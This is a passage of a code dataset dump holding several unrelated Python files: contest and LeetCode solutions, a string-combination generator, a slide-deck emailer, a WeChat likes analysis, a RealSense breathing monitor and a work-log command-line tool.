else:\n return render(request, \"templates/search.html\", message)\n","sub_path":"simpatize/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"187999148","text":"\nh,w = map(int, input().split())\ns = []\nk_cnt =0\nfor _ in range(h):\n row = input()\n k_cnt += row.count('.')\n s.append(row)\n\ncnts = [ [0]*w for _ in range(h) ]\nfor i in range(h):\n curr = 0\n for j in range(w):\n c = s[i][j]\n if c == '#': curr = 0\n else:\n curr += 1\n cnts[i][j] += curr\n \n curr = 0\n for j in range(w-1,-1,-1):\n c = s[i][j]\n if c == '#': curr = 0\n else:\n curr += 1\n cnts[i][j] += (curr-1)\n\n\nfor j in range(w):\n curr = 0\n for i in range(h):\n c = s[i][j]\n if c == '#': curr = 0\n else:\n curr += 1\n cnts[i][j] += (curr-1)\n \n curr = 0\n for i in range(h-1,-1,-1):\n c = s[i][j]\n if c == '#': curr = 0\n else:\n curr += 1\n cnts[i][j] += (curr-1)\n\nans = 0\nMOD = 10**9+7\nall_num = pow(2,k_cnt,MOD)\n# print(all_num)\nfor i in range(h):\n for j in range(w):\n ans += (all_num-pow(2,k_cnt-cnts[i][j],MOD))\n ans %= MOD\n\nprint(ans)","sub_path":"1_contest/previous/hhkb2020/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"71605948","text":"import threading\nimport queue\nfrom bruteforce.pwdproducer import PwdProducer\nfrom bruteforce.pwdconsumer import PwdConsumer\n\nyour_list = 'abc'\ncomplete_list = []\nfor current in range(5):\n a = [i for i in your_list]\n for y in range(current):\n a = [x+i for i in your_list for x in a]\n complete_list = complete_list+a\n\nprint(complete_list)\n\ncomplete_list2 = []\nfor current in range(3):\n a = [i for i in your_list]\n print(a)\n\n for y in range(current):\n b = []\n for x in a:\n for i in your_list:\n b.append(x+i)\n print(b)\n a = [i for i in b]\n\n complete_list2 = complete_list2 + a\n\nprint(complete_list2)\n\n# queue = queue.Queue(maxsize=10)\n# condition = threading.Condition()\n#\n# producer = PwdProducer(queue, condition)\n# consumers = []\n# numConsumers = 5\n# for i in range(numConsumers):\n# consumers.append(PwdConsumer(queue, condition, complete_list))\n#\n# producer.start()\n# for i in range(numConsumers):\n# consumers[i].start()\n#\n# producer.join()\n# for i in range(numConsumers):\n# consumers[i].join()","sub_path":"bruteforcemain.py","file_name":"bruteforcemain.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"326509345","text":"from storedprocedures import stored_procedures\nfrom formatconversion import format_conversion\nfrom conversionslides import conversion_slides\nfrom formattraffic import format_traffic\nfrom trafficslide import traffic_slide\nfrom sendemail import send_email\nfrom emailsettings import *\nfrom settings import *\n\nfrom pptx import Presentation\nimport numpy as np\n\n# Create traffic figures\nimport trafficfigures\n\n# Create conversion figures\nimport conversionfigures\n\n# Execute stored procedures and format the data\ndf_t_tab, df_t_ser, df_c_12, df_c_52, df_c_tab = stored_procedures()\n\ndf_t_tab, df_t_tab1, df_t_tab2 = format_traffic(df_t_tab)\n\ndf_c_tab, df_c_12 = format_conversion(df_c_tab, df_c_12)\n\n# Create a blank presentation and define size\nprs = Presentation()\n\nprs.slide_height = np.int(5.625*914400)\nprs.slide_width = 10*914400\n\n# Create text\nslide_layout = prs.slide_layouts[6]\nslide = prs.slides.add_slide(slide_layout)\nshapes = slide.shapes\n\n# Generate traffic slide\nsection_name = df_t_tab['TrafficSectionName'].tolist()\nstart_date = df_t_tab['StartDate'].tolist()\nend_date = df_t_tab['EndDate'].tolist()\n\n# Traffic metrics\nmetrics = list(zip(section_name, start_date, end_date))\n\ntraffic_slide(slide, shapes, metrics, df_t_tab1, df_t_tab2,\n traf_header_lef, traf_header_top, traf_header_wid, traf_header_hei,\n traf_table1_lef, traf_table1_top, traf_table1_wid, traf_table1_hei,\n traf_table2_lef, traf_table2_top, traf_table2_wid, traf_table2_hei)\n\n# Generate conversion slides\nsection_name = df_c_tab['KeyPerformanceIndicator'].tolist()\nstart_date = df_c_tab['StartDate'].tolist()\nend_date = df_c_tab['EndDate'].tolist()\n\nmetrics = list(zip(section_name, start_date, end_date))\n\nconversion_slides(prs, slide_layout, metrics, df_c_tab, df_c_12,\n conv_header_lef, conv_header_top, conv_header_wid, conv_header_hei,\n conv_table1_lef, conv_table1_top, conv_table1_wid, conv_table1_hei,\n conv_table2_lef, conv_table2_top, conv_table2_wid, conv_table2_hei)\n\n# Save slide deck\nprs.save(file_out)\n\n# Email slide deck file\nsend_email(send_from, send_to, subject, message, files=[file_out],\n server=server, port=port, username=username,\n password=password, use_tls=True)","sub_path":"generateDeck/trafficConversion_v2.0/createslidedeck.py","file_name":"createslidedeck.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"371979115","text":"import unittest\nfrom helloworld import TextBoardViewer, Ship\n\n\ndef createShips():\n ships = []\n shipscounter = 0\n for i in range(4):\n ships.append(Ship(shipscounter, 1, []))\n shipscounter += 1\n for i in range(3):\n ships.append(Ship(shipscounter, 2, []))\n shipscounter += 1\n for i in range(2):\n ships.append(Ship(shipscounter, 3, []))\n shipscounter += 1\n for i in range(1):\n ships.append(Ship(shipscounter, 4, []))\n shipscounter += 1\n\n\nclass TestState(unittest.TestCase):\n def setUp(self):\n self.ships = createShips()\n\n # tests PlaceShips -> Game transition\n def test_viewer(self):\n viewer = TextBoardViewer(None)\n viewer\n\n self.assertEqual(\"Game\", co.getstate().getname(self))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"testtextboardviewer.py","file_name":"testtextboardviewer.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"355201965","text":"class Solution:\n def partitionLabels(self, S: str) -> List[int]:\n # Find the last position in the string of each character\n ch2pos = {c: i for i, c in enumerate(S)}\n\n # loop through the string\n # - if the pos of the current word != cur pos\n # - loop through the positions after words and end at one that's not equals to the current one\n output = []\n j = anchor = 0\n for i, c in enumerate(S):\n j = max(j, ch2pos[c])\n if i == j:\n print(i, c)\n output.append(i - anchor + 1)\n anchor = i + 1\n return output\n","sub_path":"leetcode/lc763_Partition_Labels.py","file_name":"lc763_Partition_Labels.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"253656529","text":"import json\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom regression import *\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import roc_auc_score\n\n# 导入JSON文件\nf = open('sns_hong.json','r', encoding='UTF-8')\norigin_data = json.load(f)\n\n#print(type(origin_data))\nprint('==========================')\nprint('数据集示例:')\nprint(origin_data[1])\n#print(type(origin_data[1]))\n#print(origin_data[1]['authorName'])\nprint(\"数据集中共有{}条动态信息。\".format(len(origin_data)))\nprint('==========================\\n')\n\n# 获取用户列表\nuserNameList = []\nfor item in origin_data:\n if not (item['authorId'] in userNameList):\n userNameList.append(item['authorId'])\n for likes_user in item['likes']:\n if not (likes_user['userId'] in userNameList):\n userNameList.append(likes_user['userId'])\n# for comments_user in item['comments']:\n# if not (comments_user['authorName'] in userNameList):\n# userNameList.append(comments_user['authorName'])\n\nprint('==========================')\nprint('用户列表:')\nprint(userNameList)\nprint('数据集中共有:{}名用户'.format(len(userNameList)))\nprint('==========================')\n\n# 建立以item为主索引的item-user列表\nitemList = []\nSUMM = 0\nfor item in origin_data:\n itemDist = {}\n itemDist['snsId'] = item['snsId']\n itemDist['authorId'] = item['authorId']\n itemDist['likesSum'] = len(item['likes'])\n summ = 0\n for user in userNameList:\n itemDist[user] = 0\n for likes_user in item['likes']:\n if user == likes_user['userId']:\n itemDist[user] = 1\n summ = summ + 1\n else:\n itemDist[user] = 0\n SUMM = SUMM + summ\n itemList.append(itemDist)\n\nitemDataFrame = pd.DataFrame(itemList)\n\nprint(\"==========================\")\nprint(\"数据集中共有: {}条动态信息。\".format(len(itemList)))\nprint(\"动态列表示例:\")\nprint(itemList[1])\nLikesSUM = 0\nNonLikes = 0\nfor item in itemList:\n LikesSUM = LikesSUM+item['likesSum']\n #print(item['likesSum'])\n if item['likesSum'] == 0:\n NonLikes = NonLikes+1\nprint(\"总共有{}个点赞记录。\".format(LikesSUM))\nprint(SUMM)\nprint(\"在{}条动态信息中,有{}条动态没有任何点赞信息\".format(len(itemList), NonLikes))\nprint(\"==========================\")\n\n# 建立以user为主索引的user-item矩阵\nuser_item = np.zeros((len(userNameList), len(itemList)))\n\nuser_index = 0\nitem_index = 0\nfor user in userNameList:\n for item in origin_data:\n for item_like in item['likes']:\n if user == item_like['userId']:\n user_item[user_index, item_index] = 1\n item_index = item_index + 1\n user_index = user_index + 1\n item_index = 0\n\nprint(user_item.shape)\n\n# 检测user-item矩阵中是否包含了所有的点赞记录\nSUMM = 0\nfor i in range(len(userNameList)):\n for j in range(len(itemList)):\n if user_item[i,j] != 0:\n SUMM = SUMM + 1\n\nprint(SUMM)\n\nsingle_max = []\nall_max = []\ntemp = {}\n\ndef takeSecond(elem):\n return elem[1]\n\nfor item in itemList:\n Likes_max = (item['likesSum']) #单条动态获赞数\n Author_max = (item['authorId'])\n if Author_max in temp:\n temp[Author_max] += Likes_max\n else:\n temp[Author_max] = Likes_max\n if Author_max != ('wxid_vyebwqsb5wo21'):\n single_max.append((Author_max,Likes_max)) #单条获赞最多\n\nsingle_max.sort(key=takeSecond, reverse=True)\nprint ('单条动态获赞前5(除用户自身外):')\nprint (single_max[0:5])\n\nf = zip(temp.values(),temp.keys())\nall_max = sorted(f,reverse = True)\nprint ('获赞总数前20:')\nprint (all_max[0:21])\n\n#建立互动矩阵 计算每位用户为其他用户所有动态的点赞总数\nuser_interaction = np.zeros((len(userNameList), len(userNameList)))\nuser_index = 0\nusers_index = 0\nfor item in origin_data:\n for user in userNameList:\n if user == item['authorId']:\n for users in userNameList:\n for item_like in item['likes']:\n if users == item_like['userId']:\n user_interaction[user_index, users_index] += 1\n users_index +=1\n user_index +=1\n users_index =0\n user_index =0\n\nmy_num = userNameList.index('wxid_vyebwqsb5wo21') #获取我在用户列表中的索引位置\nmy_interaction = user_interaction[my_num] #我为其余用户的点赞总数\nnum = range(0,(len(userNameList))-1) #添加位置索引\nf1 = zip(my_interaction,userNameList,num)\nmy_top = sorted(f1,reverse = True)\nmy_top20 = my_top[0:20] #被我点赞最多的前20名用户\nprint ('互动最高(点赞次数最多):')\nprint (my_top20)\n\n# 建立以top20为主索引的top20-item矩阵\ntop20_item = np.zeros((len(my_top20)+1, len(itemList)))\nnum_index = 0\nfor top_tuple in my_top20:\n top_index = top_tuple[2]\n top20_item[num_index]=user_item[top_index]\n num_index +=1\ntop20_item[num_index]=user_item[my_num] #矩阵最后加上我的点赞记录\nprint ('top(20+1)*item矩阵')\nprint (top20_item)\n\n#建立co-occurrence矩阵\nco_occurrence = np.zeros((len(userNameList),len(userNameList)))\nfor item in origin_data:\n for likes_user in item['likes']:\n user_index = userNameList.index(likes_user['userId'])\n for likes_user_others in item['likes']:\n if likes_user_others != likes_user:\n user_others_index = userNameList.index(likes_user_others['userId'])\n co_occurrence[user_index,user_others_index] +=1\n\nprint (co_occurrence)\n\n#找出与我点赞行为最相似的用户\nmy_co_occurrence = co_occurrence[my_num]\nf2 = zip(my_co_occurrence,userNameList,num)\nmy_co_top = sorted(f2,reverse = True)\nmy_co_top20 = my_co_top[0:20] #跟我共同点赞最多的前20名用户\nprint ('同时点赞次数最多:')\nprint (my_co_top20)\n\n#删除无点赞信息或只有我点赞的item 构建user_item_arranged矩阵\nitem_user = np.transpose(user_item)\nitem_arranged = []\nfor i in range(0,len(item_user)):\n if sum(item_user[i]) !=0 : #有点赞记录的item\n if sum(item_user[i]) ==1:\n if item_user[i,my_num] != 1 : #去除仅被我点赞的item\n item_arranged.append(item_user[i])\n else:\n item_arranged.append(item_user[i])\nuser_item_arranged = np.transpose(item_arranged)\n\n# 建立以co_top20为主索引的co_top20_item矩阵\nco_top20_item = np.zeros((len(my_co_top20)+1, len(item_arranged)))\nnum_index = 0\nfor top_tuple in my_co_top20:\n top_index = top_tuple[2]\n co_top20_item[num_index]=user_item_arranged[top_index]\n num_index +=1\nco_top20_item[num_index]=user_item_arranged[my_num] #矩阵最后加上我的点赞记录\nprint ('co_top(20+1)*item矩阵')\nprint (co_top20_item)\n\nd = np.transpose(co_top20_item)\n#np.random.shuffle(d) #随机乱序\nn, m = d.shape\ntest_num = round(1 * n / 3) #取数据集前1/3为测试集\ntrain_num = n - test_num #后2/3训练集\ntrain_data = d[0:train_num,0: (m-1)]\ntrain_data = np.c_[train_data, np.ones((train_num,1))] #回归的时候会有常数项,故此处加了一列\ntrain_label = d[0:train_num,m-1].reshape(train_num,1) #python中一维数组默认是行向量,需要reshape函数转换\ntest_data = d[train_num:n,0: (m-1)]\ntest_data = np.c_[test_data, np.ones((test_num, 1))]\ntest_label = d[train_num:n,m-1].reshape(test_num,1)\n\nprint (\"\\n linear regression\")\nprint (\"\\t training start ...\")\nthreshold = (max(train_label) + min(train_label)) / 2\ngamma, eps, max_iter = 0.001, 0.00001, 10000\nw = linear_regression(train_data, train_label, 'gd', gamma, eps, max_iter)\nprint (\"\\t training done !\")\ntrain_y_predict = train_data.dot(w)\ntest_y_predict = test_data.dot(w)\n\nprint (\"\\t train predict error\\t: %f\"%(sum( abs( ((train_y_predict > threshold) + 0) - ((train_label > threshold) + 0) ))[0] / (train_num + 0)))\nprint (\"\\t test predict error \\t: %f\"%(sum( abs( ((test_y_predict > threshold) + 0) - ((test_label > threshold) + 0) ))[0] / (test_num + 0)))\nprediction_arranged = np.zeros((len(test_y_predict), 1))\nlength = len(test_y_predict)\nj = range(0,length-1)\nfor i in j:\n if test_y_predict[i] > 0.2:\n prediction_arranged[i] = 1\n\naccuracy = accuracy_score(test_label,prediction_arranged)\nprecision = precision_score(test_label,prediction_arranged)\nrecall = recall_score(test_label,prediction_arranged)\nfpr,tpr,thresholds = roc_curve(test_label,prediction_arranged)\nroc_auc = roc_auc_score(test_label,prediction_arranged)\n\nplt.plot(fpr,tpr,linewidth=2,label=\"ROC\")\nplt.xlabel(\"false presitive rate\")\nplt.ylabel(\"true presitive rate\")\nplt.ylim(0,1.05)\nplt.xlim(0,1.05)\nplt.legend(loc=4)#图例的位置\nplt.show() #ROC曲线\n\nprint('准确率:{}'.format(accuracy))\nprint('精确率:{}'.format(precision))\nprint('召回率:{}'.format(recall))\n\n'''\nprint (\"\\nlog regression\")\nprint (\"\\t training start ...\")\nmin_label, max_label = min(train_label), max(train_label)\ntrain_label = train_label - min_label + 1 #保证label>0,才可以取对数\ntest_label = test_label - min_label + 1 #保证label>0,才可以取对数\nthreshold = (np.log(max(train_label)) + np.log(min(train_label))) / 2\ngamma, eps, max_iter = 0.001, 0.00001, 10000\nw = log_regression(train_data, train_label, 'gd', gamma, eps, max_iter)\ntrain_y_predict = train_data.dot(w)\ntest_y_predict = test_data.dot(w)\nprint (\"\\t training done\")\nprint (\"\\t train predict error\\t: %f\"%(sum( abs( ((train_y_predict > threshold) + 0) - ((train_label > threshold) + 0) ))[0] / (train_num + 0.0)))\nprint (\"\\t test predict error \\t: %f\"%(sum( abs( ((test_y_predict > threshold) + 0) - ((test_label > threshold) + 0) ))[0] / (test_num + 0.0)))\n\nprint (\"\\nlogistic regression\")\nprint (\"\\t training start ...\")\nmin_label, max_label = min(train_label), max(train_label)\ntrain_label = (train_label - min_label) / (max_label - min_label) #将label变为0,1\ntest_label = (test_label - min_label) / (max_label - min_label) #将label变为0,1\nthreshold = 0.5\ngamma, eps, max_iter = 0.001, 0.00001, 10000\nw = logistic_regression(train_data, train_label, 'gd', gamma, eps, max_iter)\nprint (\"\\t training done\")\ntrain_y_predict = sigmoid(train_data.dot(w))\ntest_y_predict = sigmoid(test_data.dot(w))\nprint (\"\\t train predict error \\t: %f\"%(sum( abs( ((train_y_predict > threshold) + 0) - ((train_label > threshold) + 0) ))[0] / (train_num + 0.0)))\nprint (\"\\t test predict error \\t: %f\"%(sum( abs( ((test_y_predict > threshold) + 0) - ((test_label > threshold) + 0) ))[0] / (test_num + 0.0)))\n\n'''","sub_path":"JSONTest(1).py","file_name":"JSONTest(1).py","file_ext":"py","file_size_in_byte":10736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"248989058","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Dec 22 10:04:48 2020\r\n\r\n@author: Allan\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pyrealsense2 as rs\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimport scipy.io\r\nimport scipy.signal as signal\r\n\r\nface_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')\r\nmean_all=[]\r\n#mean_all=np.zeros([1500,1])\r\nframe_all=[]\r\nconfig = rs.config()\r\nconfig.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)\r\nconfig.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)\r\n#rs.config.enable_device_from_file(config, \"C:/Users/Allan/Desktop/JRF/Realsense/Python/test3.bag\", repeat_playback=False)\r\npipeline = rs.pipeline()\r\nprofile=pipeline.start(config)\r\ndevice = profile.get_device()\r\ndepth_sensor = device.query_sensors()[0]\r\nset_laser = 20\r\ndepth_sensor.set_option(rs.option.laser_power, set_laser)\r\ntemp=np.zeros([2,1])\r\npeaks=[]\r\nvalley=[]\r\ncon=[]\r\ni=0\r\nj=0\r\nk=0\r\n\r\na1=scipy.io.loadmat('filter_coef_2.mat')\r\na=a1['h']\r\na=np.transpose(a)\r\na=a[:,0]\r\n\r\n#playback = profile.get_device().as_playback()\r\n#playback.set_real_time(False)\r\n\r\n#a=np.load('filt_coeff_1.npy')\r\nx_n=np.zeros([17,])\r\ntry:\r\n while True:\r\n # Wait for a coherent pair of frames: depth and color\r\n frames = pipeline.wait_for_frames()\r\n frame_no=frames.get_frame_number() #Get frame number\r\n frame_time=frames.get_timestamp() #Get timestamp\r\n frame_all.append(frame_no)\r\n i=i+1\r\n if frame_no<20:\r\n continue\r\n if frame_no>1500:\r\n break\r\n depth_frame = frames.get_depth_frame()\r\n color_frame = frames.get_color_frame()\r\n if not depth_frame or not color_frame:\r\n continue\r\n\r\n # Convert images to numpy arrays\r\n depth_image = np.asanyarray(depth_frame.get_data())\r\n color_image = np.asanyarray(color_frame.get_data())\r\n #Convert color to gray for classifier\r\n gray_bg=cv2.cvtColor(color_image,cv2.COLOR_BGR2GRAY)\r\n depth_color = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)\r\n #Detect faces in grayed RGB frame\r\n faces=face_cascade.detectMultiScale(gray_bg,1.1,5)\r\n #Use coordinates to define ROI\r\n # for (x,y,w,h) in faces:\r\n # img=cv2.rectangle(color_image,(x-50,y+250),(x+w,y+h+220),(255,0,0),2)\r\n # img1=cv2.rectangle(depth_color,(x-50,y+250),(x+w,y+h+220),(0,255,0),2)\r\n # roi_bg=color_image[y:y+h,x:x+w]\r\n #images.append(color_image)\r\n #Use ROI to find chest in depth frame\r\n (x,y,w,h) =faces[0]\r\n roi_depth=depth_image[y+250:y+h+220,x-50:x+w]\r\n #roi_all.append(roi_depth)\r\n #Replace zeros in depth with median value \r\n roi_meter=roi_depth*0.001\r\n m=np.median(roi_meter[roi_meter>0])\r\n roi_meter[roi_meter==0]=m\r\n \r\n mean_depth=np.mean(roi_meter)\r\n mean_all.append(mean_depth)\r\n# mean_all[i]=mean_depth\r\n \r\n try:\r\n# x_n=np.delete(x_n,-1)\r\n x_n=np.roll(x_n,1)\r\n x_n[0]=mean_depth\r\n k=k+1\r\n y=a*x_n\r\n y=sum(y)\r\n# y=np.convolve(a,x_n)\r\n #y=signal.lfilter(a,1,x_n)\r\n# y=sum(y)\r\n con.append(y)\r\n except:\r\n continue\r\n# con=con[::-1]\r\n if i>=1:\r\n diff_mean=np.sign(con[j]-con[j-1])\r\n j+=1\r\n temp[1]=diff_mean\r\n if temp[0]!=temp[1]:\r\n if temp[1]==-1:\r\n peaks.append(j-1)\r\n \r\n elif temp[1]==1:\r\n valley.append(j-1)\r\n \r\n temp[0]=temp[1]\r\n print(\"frame number\",frame_no)\r\n \r\n # Apply colormap on depth image (image must be converted to 8-bit per pixel first)\r\n \r\n# color_all.append(color_frame)\r\n# Stack both images horizontally\r\n # images = np.hstack((color_image, depth_color))\r\n #print(\"frame no\",frame_no)\r\n# mean_all=np.array(mean_all)\r\n# plt.figure(2)\r\n# plt.plot(mean_all)\r\n# plt.plot(mean_all[peaks],'x')\r\n# plt.plot(mean_all[valley],'o')\r\n# plt.pause(0.0001)\r\n\r\n # Show images\r\n # cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)\r\n # cv2.imshow('RealSense', depth_color)\r\n # key=cv2.waitKey(1)\r\n # if key & 0xFF == ord('q') or key == 27:\r\n\r\n # cv2.destroyAllWindows()\r\n # break\r\nexcept RuntimeError:\r\n print(\"There are no more frames left in the .bag file!\")\r\n\r\nfinally:\r\n pipeline.stop()\r\n\r\n# ts=frame_all[len(frame_all)-1]-frame_all[0]\r\n# ts=ts*0.001\r\ntot_time=frame_no/30\r\n# print(\"Total time(in sec) is \",ts)\r\n# time=np.linspace(0,tot_time,num=len(mean_all))\r\n# mean_out=[sum(mean_all[i:i+3])/3 for i in range(len(mean_all)-3+1)]\r\n# mean_out=np.array(mean_out)\r\n# mean_out=mean_out[np.logical_not(np.isnan(mean_out))]\r\n# mean_decimate=signal.decimate(mean_all,3)\r\n\r\n# for i in np.arange(0,len(mean_all)):\r\n# if i>=1:\r\n# diff_mean=np.sign(mean_all[i]-mean_all[i-1])\r\n# temp[1]=diff_mean\r\n# if temp[0]!=temp[1]:\r\n# if temp[1]==-1:\r\n# peaks.append(i-1)\r\n# elif temp[1]==1:\r\n# valley.append(i-1)\r\n# temp[0]=temp[1]\r\n#con=con[13:len(con)]\r\ncon=np.array(con)\r\npeaks=np.array(peaks)\r\nvalley=np.array(valley)\r\ntime1=np.linspace(0,tot_time,num=len(mean_all))\r\ntime2=np.linspace(0,tot_time,num=len(con))\r\nplt.figure(3)\r\nplt.plot(time1,mean_all)\r\n#mean_all=np.array(mean_all)\r\n#plt.plot(time1[peaks],mean_all[peaks],'x')\r\n#plt.plot(time1[valley],mean_all[valley],'o')\r\nplt.figure(4)\r\nplt.plot(time2,con)\r\nplt.plot(time2[peaks],con[peaks],'x')\r\nplt.plot(time2[valley],con[valley],'o')\r\n# plt.ylim([mean_tot+0.05,mean_tot-0.05])\r\n# plt.figure(4)\r\n# plt.plot(time1,mean_decimate)\r\n# plt.show()\r\n\r\n# ##Plot belt respiration\r\n# #ref=pd.read_csv('C:/Users/Allan/Desktop/JRF/Realsense/Python/Reference/test1.csv')\r\n# #time2=ref['Time(s)']\r\n# #resp=ref['Force(N)']\r\n# #resp_norm=(resp-resp.min())/(resp.max()-resp.min())\r\n# #plt.plot(time2,resp_norm)","sub_path":"Live_Run/playback_Viola_chest.py","file_name":"playback_Viola_chest.py","file_ext":"py","file_size_in_byte":6164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"516566898","text":"import config\nimport os\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\n\nfrom clint.textui import colored, indent, puts\n\nfrom libs import app\n\n\nclass WWorkApp(app.Application):\n STORAGE_RELATIVE_PATH = '/storage/'\n COLORS = {\n 'blu': ('\\x1b[34m\\x1b[22m', '\\x1b[39m\\x1b[22m'),\n 'gre': ('\\x1b[32m\\x1b[22m', '\\x1b[39m\\x1b[22m'),\n 'red': ('\\x1b[31m\\x1b[22m', '\\x1b[39m\\x1b[22m'),\n 'yel': ('\\x1b[33m\\x1b[22m', '\\x1b[39m\\x1b[22m'),\n }\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialization method.\"\"\"\n super().__init__(*args, **kwargs)\n self._file = None\n self.previous = None\n\n for flag in self.flags.all:\n if flag and flag.startswith('-y'):\n self.previous = -flag.count('y')\n\n @app.register('start')\n def start(self):\n \"\"\"Command to start a new perfect work day!\n\n Example:\n ww start # creates file for current day\n ww start prev # creates file for previous day\n\n \"\"\"\n if self.file_exists():\n return self.print(\n 'Day already started! Go to work now ;)'\n )\n\n result = self.write('s', 'Start a new work day!', new_file=True)\n\n self.print(result)\n self.print(f'File \"{self.file_path}\" has been created!')\n\n @app.register('end')\n def end(self):\n \"\"\"Command to end this hard work day!\n\n Example:\n ww end\n\n \"\"\"\n assert self.file\n assert self.not_on_pause\n\n result = self.write('e', 'End of the day!', new_file=False)\n\n # Show result\n self.print(result)\n self.print('Day finally ended!')\n\n @app.register('delete', 'del')\n def delete_file(self):\n \"\"\"Command to delete file.\n\n Example:\n ww del 2018-12-31\n ww delete 2018-12-31\n ww delete 2018-12-31.txt\n\n \"\"\"\n if not self.extra:\n self.exit('Specify date in format like 2018-12-31')\n\n file_date = self.extra[0].rstrip('.txt')\n file_path = self.storage_dir + file_date + '.txt'\n\n if not self.file_exists(path=file_path):\n self.exit(f'Error! File \"{file_path}\" does not exist!')\n\n try:\n os.remove(file_path)\n except Exception:\n self.exit(f'Error on removing file {file_path}')\n\n self.print(f'File \"{file_path}\" was successfully deleted!')\n\n @app.register('pause', 'p')\n def pause(self):\n \"\"\"Command to end this hard work day!\n\n Example:\n ww end\n\n \"\"\"\n # Enable pause\n if self.last_command != 'p':\n self.write('p', 'Pause init ╮')\n self.print('Pause is enabled. Go REST. Or EAT.')\n\n # Disable pause\n else:\n self.write('u', 'Pause stop ╯')\n self.print('Pause is disabled. Go WORK.')\n\n duration = self.get_duration(start=-2, end=-1)\n self.print(f'Pause duration is {duration}')\n\n @app.register('time')\n def count_time(self):\n if len(self.extra) != 1:\n self.exit('Incorrect command format')\n\n value = float(self.extra[0])\n remaining = 8.0 - value\n self.print(\n f'{value} is {int(value // 1)} hours and '\n f'{int(value % 1 * 60)} minutes'\n )\n self.print(\n f'Remaining time is {int(remaining // 1)} hours and '\n f'{int(remaining % 1 * 60)} minutes'\n )\n\n @app.register(default=True)\n def log_task(self, task=None, msg=None):\n \"\"\"Command to log your work (default command).\n\n Example:\n ww JIRA-1012 I did something interesting\n ww 1024 Jira code can be skipped\n ww Standup\n\n \"\"\"\n if len(set(self.command)) == 1:\n self.exit('Probably, you won\\'t log task with one symbol...')\n\n assert self.file\n assert self.not_on_pause\n\n change_time = 0\n\n for word in tuple(self.extra):\n if word.startswith('+'):\n change_time = int(word[1:])\n self.extra.remove(word)\n\n if task:\n string = f'{task}: '\n elif self.command.split('-')[-1].isdigit():\n string = f'{config.DEFAULT_JIRA_CODE}-{self.command}: '\n elif self.command.split('.')[-1].isdigit():\n a, b = self.command.split('.')\n string = f'{a}-{b}: '\n else:\n string = f'{config.MAIN_TASK_CODE}: {self.command} '\n\n msg = msg or ' '.join(self.extra)\n\n string += msg\n\n if not string.endswith(('.', '!', '?', ')', '(')):\n string = string.strip() + '.'\n\n result = self.write('w', string, change_time=change_time)\n\n self.print(result)\n self.print('Task is logged ✓', pre='')\n\n @app.register(empty_args=True)\n def main_screen(self):\n \"\"\"Command to show main app screen.\n\n Example:\n ww # main screen for current day\n\n \"\"\"\n assert self.file\n\n os.system('clear')\n\n colors_map = {\n 's': colored.green,\n 'u': colored.yellow,\n 'p': colored.yellow,\n 'e': colored.red,\n }\n\n with indent(2):\n if self.previous is not None:\n formatted = self.date.strftime('%B %d, %A')\n self.print(f'DATE: {formatted}')\n self.print(f'FILE: {self.file_path}')\n\n # Show main table\n self.print('TIME TASK NAME', post='\\n')\n\n for line in self.file:\n color = colors_map.get(line[0])\n msg = (color(line[2:7]) if color else line[2:7]) + line[7:]\n self.print(msg, pre='', newline=False)\n\n @app.register('fc', 'from')\n def from_commit(self):\n commit_msg = os.popen('git log -1').read()\n\n if not commit_msg:\n self.exit('This is not a git repository')\n\n messages = commit_msg.split('\\n')[4:]\n message = messages[0].lstrip() + '.' # one liner usually has no dot\n self.print(message)\n\n self.write('w', message)\n\n @app.register('e', 'edit')\n def edit(self):\n editor = 'vim'\n os.system(' '.join([editor, self.file_path]))\n\n @app.register('st', 'stand', 'standup')\n def standup(self):\n self.log_task(task='RND-4', msg='[STANDUP]')\n\n # Helper methods\n # ========================================================================\n\n def print(self, msg, color=None, pre='\\n', post='', newline=True):\n \"\"\"Print message in console.\"\"\"\n msg = pre + msg + post\n\n if color:\n msg = color(msg)\n else:\n for name, data in self.COLORS.items():\n msg = msg.replace(f'<{name}>', data[0])\n msg = msg.replace(f'', data[1])\n\n puts(msg, newline)\n\n def exit(self, msg):\n self.print(msg, color=colored.red, pre='\\n', post='\\n')\n exit()\n\n def file_exists(self, path=None):\n return Path(path or self.file_path).is_file()\n\n @property\n def storage_dir(self):\n return os.path.dirname(__file__) + self.STORAGE_RELATIVE_PATH\n\n @property\n def file_path(self):\n return self.storage_dir + self.get_date(delta=self.previous) + '.txt'\n\n @property\n def date(self):\n return self.get_date(delta=self.previous, as_string=False)\n\n @property\n def file(self):\n if not self._file:\n self._file = self.read_file()\n\n return self._file\n\n @property\n def last_command(self):\n return self.file[-1][0]\n\n @property\n 